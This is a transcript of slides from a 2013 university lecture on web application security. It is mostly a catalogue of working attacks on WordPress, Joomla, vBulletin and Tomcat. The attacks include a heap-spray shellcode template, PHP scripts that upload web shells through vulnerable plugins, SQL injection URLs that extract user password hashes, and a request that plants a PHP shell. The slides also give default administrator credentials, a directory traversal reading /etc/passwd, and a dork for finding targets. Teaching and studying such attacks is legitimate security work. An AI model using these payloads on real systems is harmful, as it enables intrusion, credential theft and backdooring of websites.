Positive Hack Days. Ванин. Безопасность в «облаках» VS «Безоблачная» безопасность
Безопасность интернет-приложений осень 2013 лекция 10
19
-
Upload
technopark -
Category
Education
-
view
37.873 -
download
69
Transcript of Безопасность интернет-приложений осень 2013 лекция 10
2
JSVBActionScriptHTML5SGMLSVG
spray the heap exploit the bug profit!
Любой динамически задаваемый контент.
3
nops = unescape("%u0D0D%u0D0D");shellcode = unescape("%u...);heap = new Array();for ( i=0; i<slen;i++){
heap[i] = nops + shellcode;}exploit();
heap[slen]:NOPS
shell
heap[slen-1]:NOPS
shell
heap[0]:NOPS
shell
...
4
var a = (0x11223344^0x44332211^0x44332211^ ...);
0: b8 44 33 22 11 mov $0x11223344,%eax 5: 35 11 22 33 44 xor $0x44332211,%eax a: 35 11 22 33 44 xor $0x44332211,%eax
1: 44 inc %esp2: 33 22 xor (%edx),%esp4: 11 35 11 22 33 44 adc %esi,0x44332211a: 35 11 22 33 44 xor $0x44332211,%eax
6
Wordpress checks
admin location /wp-admin/
admin user admin
plugins /wp-content/plugins
themes /wp-content/themes
scanner nmap http-wordpress-plugins
nmap --script=http-wordpress-plugins --script-args \http-wordpress-plugins.root="/blog/" <target>
7
Exploit: suco theme file upload
<?php$uploadfile="devilscream.php";$ch = curl_init("http://127.0.0.1/wp-content/themes/suco/themify/themify-ajax.php?upload=1");curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$postResult = curl_exec($ch);curl_close($ch);print "$postResult";?>
shell: http://SITE-TARGET/wp-content/themes/suco/uploads/devilscream.php
8
Exploit: wp-realty blind sql
http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]
9
Exploit: Complete Gallery Manager 3.3.3 file upload
<?php$uploadfile="up.php";$ch = curl_init("http://target/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$postResult = curl_exec($ch);curl_close($ch);print "$postResult";
?>
10
Exploit: All Video Gallery 1.1 sqli
http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users--
11
Joomla checks
admin location /administrator/
admin user admin
components /components/com_*
parameter components /?option=com_*
scanner joomscan
12
Exploit: redSHOP component sqli
http://example.com/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24%22%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,concat_ws%280x203a20,%20user%28%29,%20database%28%29,%20version%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&cmd=add&cid=20&sid=0.6886686905513422
13
Exploit: com_civicrm component remote code execution
wget –post-data "<?php phpinfo(); ?>" http://target/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=shell.php
14
vBulletin checks
admin location /admincp/
admin user admin
addons /
15
Exploit: Yet Another Award sqli
$vbulletin->input->clean_array_gpc('p', array('award_id' => TYPE_UINT,//'award_request_name' => TYPE_STR,//'award_request_recipient_name' => TYPE_STR,'award_request_reason' => TYPE_STR,'award_request_uid' => TYPE_UNIT,
));
$award_request_uid = $vbulletin->GPC['award_request_uid'];$db->query_write("INSERT INTO " . TABLE_PREFIX . "award_requests (award_req_uid, award_rec_uid, award_req_aid, award_req_reason) VALUES ('$award_request_uid', '$award_request_uid', '$award[award_id]', '". $db->escape_string($vbulletin->GPC['award_request_reason']) ."')");
Google dork: inurl:awards.php intext:"powered by vbulletin"
http://[site].com/request_award.phpPOST: do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit
16
Exploit: vBulletin 4.1.10 LFI
http://target/Patch/includes/functions_cron.php?nextitem=[Lfi]
http://[site].com/request_award.phpPOST: do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit
17
Tomcat checks
admin location /admin/ /manager/
admin user admin
addons /
tomcat:tomcatpassword:passwordadmin:adminadmin:passwordadmin:<nopassword>tomcat:<nopassword>
18
Exploit: tomcat < 6.0.18 utf8 directory traversal
GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
19
5 апреля 2010
jira issue: http://tinyurl.com/XXXXXXXXX
XSS
получение административного доступа в jira
backdoor
